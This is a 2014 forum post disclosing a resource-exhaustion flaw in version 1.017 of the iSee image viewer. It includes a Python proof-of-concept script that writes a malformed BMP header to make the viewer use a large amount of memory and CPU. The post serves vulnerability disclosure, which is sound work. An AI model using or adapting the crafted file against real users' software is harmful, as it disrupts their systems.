-
-
[原创]iSee爱看(最新版1.017)解析漏洞
-
发表于:
2014-6-13 12:22
2973
-
www.iseeclan.com/
存在准拒绝服务漏洞。
iSee爱看为一款图片查看工具。
处理一个不到100字节的文件,可以占用系统的大量内存和cpu(300M & 50% cpu)。
poc.py
import os
os.system("color 02")
print"###########################################################"
print"# iSee 1.017 PoC #"
print"###########################################################"
header=("\x42\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"
"\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\x7F\x01\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF")
filename = "poc.bmp"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
